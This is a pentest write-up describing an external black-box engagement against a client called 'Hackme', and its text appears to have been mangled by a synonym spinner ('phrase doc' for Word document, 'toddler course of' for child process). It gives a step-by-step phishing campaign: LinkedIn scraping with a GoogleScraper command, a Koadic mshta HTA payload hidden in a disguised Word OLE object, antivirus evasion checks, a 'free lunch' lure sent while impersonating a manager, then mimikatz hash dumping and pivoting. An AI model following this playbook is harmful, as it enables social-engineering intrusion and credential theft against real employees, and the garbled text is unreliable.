The target was easy – see how prone the group is from an exterior standpoint and take a look at the effectiveness of the safety controls which are managed enterprise-wide. As such, asides, the corporate title, we got “ZERO” data to carry out an exterior black-box penetration Testing.
This black-box exterior penetration Testing Performing with a by a consumer known as (Hackme)
We kicked off with some Open Supply Intelligence (OSINT) 101 :). There are fairly quite a lot of open supply intelligence instruments – to help in gathering emails, subdomains, hosts, worker names, and so on from completely different public sources like serps and shodan. There’s an exhaustive record of such superior instruments right here .
Utilizing fairly just a few open supply intelligence instruments, we obtained publicly out there paperwork regarding the group utilizing Black-box Penetration Testing strategies.
With Google dork to the rescue, we ran some fundamental search strings: “web site:*.hackme.com ext:xls OR ext:docx OR ext:pptx” .
Additionally Learn: Community Penetration Testing Guidelines
In fact, our goal was to not tirelessly seek for paperwork. Slightly, our goal was to grasp the group’s naming schema by inspecting the metadata of the paperwork which is discovered within the “properties part” of the doc (most particularly Microsoft Phrase, PowerPoint, and Excel). One can even use FOCA for this.
From this, I observed that staff emails adopted a selected naming conference – the primary letter of the firstname + surname @ area.com i.e. [email protected].
Armed with this information, we forked out from LinkedIn the record of all present staff of Hackme utilizing the next google dork syntax:
web site:linkedin.com -inurl:dir “at Hackme” “Present”. A typical instance is proven beneath utilizing Google Inc as a reference firm.
By hacking a script to automate the method, we copied out the primary names, final names and the roles of the present staff of Hackme.
A tiring strategy is to manually crawl by way of the google pages in seek for these names and position or one might additionally use GoogleScraper:
GoogleScraper -m http –key phrase “web site:linkedin.com -inurl:dir ‘at Hackme’ ‘Present’” –num-pages-for-keyword 3 –output-filename output.json
Outcome: Black-box Penetration Testing
Once more, I go away the chances to your creativeness – however you’ll be able to simply convert this to a .csv file utilizing https://json-csv.com/ or some other converter that works for you.
then utilizing your favourite phrase processor (phrase merge, notepad++, and so on) or some good scriptful abilities, merge the firstname + lastname – to kind your e-mail record.
Feed our Goal record a Payload
Since we’re simulating a Black-box Penetration Testing, we determined (similar to what an attacker would do) to achieve code execution utilizing malicious payloads. As such, we considered making a payload and sending it by way of emails to staff of Hackme.
We additionally know that it’s a frequent observe for some file kind/extensions to be blocked by the group’s e-mail filters – to restrict publicity to danger.
This then brings us to utilizing Koadic C3 COM Command & Management, a really respectable framework similar to your Meterpreter or Empire.
What made it actually stand out asides the attractive interface is that it permits one to dump hashes, obtain/add recordsdata, execute instructions, bypass UAC, scan native community for open SMB, pivot to a different machine, load mimikatz and much more.
So we ran Koadic and set the required variables – utilizing the “stager/js/mshta “ module (serves payloads in reminiscence utilizing MSHTA.exe HTML Functions).
The consequence was a spawn of our HTA payload URL as evidenced within the screenshot above. Nevertheless, we want our targets to execute our payload as “mshta payload_url“.
In recent times, HTA payloads have been used as an online assault vector and likewise, to drop malware on a sufferer’s PC. Now we have to get this payload previous our sufferer’s quite a few defenses.
Right here comes the tough half – we would have liked a approach to have the sufferer run “mshta payload_url” with out our payload being spawned as a toddler course of of mshta.exe – as we suspect this group’s blue group could flag this.
Fortunately, we noticed the tip on the left from Matt Nelson and curiously, the group at NCC group have this carried out in Demiguise.
So right here is our ultimate payload saved as a .hta file.
The following step sometimes is to ship our .hta payload as an embedded OLE object.
The supposed assault situation was:
- Ship a Microsoft phrase doc with our .hta payload embedded as an OLE object.
- Get the person to open the phrase doc and the embedded OLE object.
- This spawns a brand new course of and we get a shell entry into our sufferer’s PC.
Now we get to the fascinating half, we want our sufferer to open the Microsoft phrase doc and our payload.
To do that, we want a really compelling story – simply because customers are getting smarter. So we headed again to doing extra recon.
…and extra recon
We have to know extra about Hackme – particularly the tradition and staff conduct. The query we stored asking ourselves was “what would curiosity the workers?”
The place else to get this data than Glassdoor , a platform that offers you inside scoop on firms with worker evaluations about salaries, advantages, professionals and cons of working with the corporate.
After poring by way of evaluations of Hackme on Glassdoor, we discovered some frequent themes:
…and extra recon
We have to know extra concerning the goal group’s surroundings – particularly staff. The query we stored asking ourselves – what would curiosity the workers?
The place else to get this data than Glassdoor, a platform that offers you inside scoop on firms with worker evaluations about salaries, advantages, professionals and cons of working with the corporate.
After poring by way of evaluations of the goal group on Glassdoor, we discovered some frequent themes:
- Some staff felt mobility was a problem because the workplace is sort of an extended distance from residential places.
- Staff love the group as a result of they get free lunch.
Just like the previous saying goes, the quickest approach to a person’s coronary heart is thru his abdomen. So what higher approach to get the workers to open our payload embedded phrase doc?
Ship them an e-mail – telling them there’s a change within the FREE LUNCH menu ranging from tomorrow.
Slightly than ship a random phishing e-mail to staff that could possibly be noticed simply, we determined a seemingly real e-mail can be preferrred full with Hackme e-mail signature whereas observing the group e-mail tradition.
Now, how can we make our e-mail extra plausible? By sending an e-mail to Customer support/Assist Desk with a service request and observing the e-mail signature within the response.
… recon once more???
We headed again to Linkedin, to search for the title of both the HR Supervisor, Logistic Supervisor or Admin Supervisor (whichever is suitable) of Hackme. We fastidiously crafted an e-mail signature with the title we chosen.
We’re midway by way of sending our payload now. Have some endurance and browse on…
It’s time to ship our payload
From the metadata recon executed earlier, we might inform what our goal group’s doc headers and footers regarded like.
I then created a brand new phrase doc just like the one proven beneath with a splitting picture of Hackme doc template with applicable headers/footers.
Then we embedded our .hta as an OLE object. Microsoft Phrase Doc >> Insert >> Object >> Bundle. We modified the icon to Microsoft Phrase’s icon and likewise the caption to mirror our message.
Change the icon to Microsoft Phrase’s icon and likewise, change the caption to mirror your message.
Don’t Neglect the Anti-virus!!!
To examine the AV detection price of our payload – and to see if it will likely be flagged as malicious by Hackme antivirus resolution (if any), we did a fast AV scan on nodistribute.com. Nodistribute.com was used as a result of in keeping with them, they don’t distribute payload samples to AV firms. We scanned each the maldoc and the .hta file as properly.
AV Scan of our .hta payload (0 detections)
It’s Time to Ship our E-mail
If the goal org doesn’t have SPF, DKIM and DMARC configured, one can simply spoof the HR Supervisor, Logistic Supervisor or Admin Supervisor’s e-mail handle.
On this case, I created a Gmail account (sure, Gmail works too) utilizing the Logistic Supervisor’s first title and final title – after which spiced it up together with his signature which was gotten earlier.
Let the shells in
Shortly after sending the e-mail, inside a interval of about 3 minutes, we had at the least 30 shell connections! W00t!!!
The remainder they typically say is historical past. From here-on, utilizing the mimikatz modules, we escalated privileges, dumped hashes, scanned the native community of Hackme, pivoted into different PCs, browsed the goal’s file programs and even turned area admins and so on.
All in all, this was a really enjoyable engagement. While it could take an attacker a month/2months/a yr of dedication to interrupt into a corporation – by way of a loophole on the infrastructure stage. It may be pretty simple for one to achieve entry by exploiting the human issue.
“When you perceive your goal surroundings, devising a inventive means in getting access to the surroundings turns into pretty simple”.
The ethical of the train is: Recon, recon and extra recon – for a smart man as soon as mentioned
“Give me six hours to cut down a tree and I’ll spend the primary 4 sharpening the axe“.
You’ll be able to observe us on Linkedin, Twitter, Fb for every day Cybersecurity updates.
Rotimi Akinyele – Rotimi is an skilled Cybersecurity, IT Governance, Danger, and Compliance (GRC) skilled. He’s an Assistant Supervisor, Cybersecurity at BDO UAE.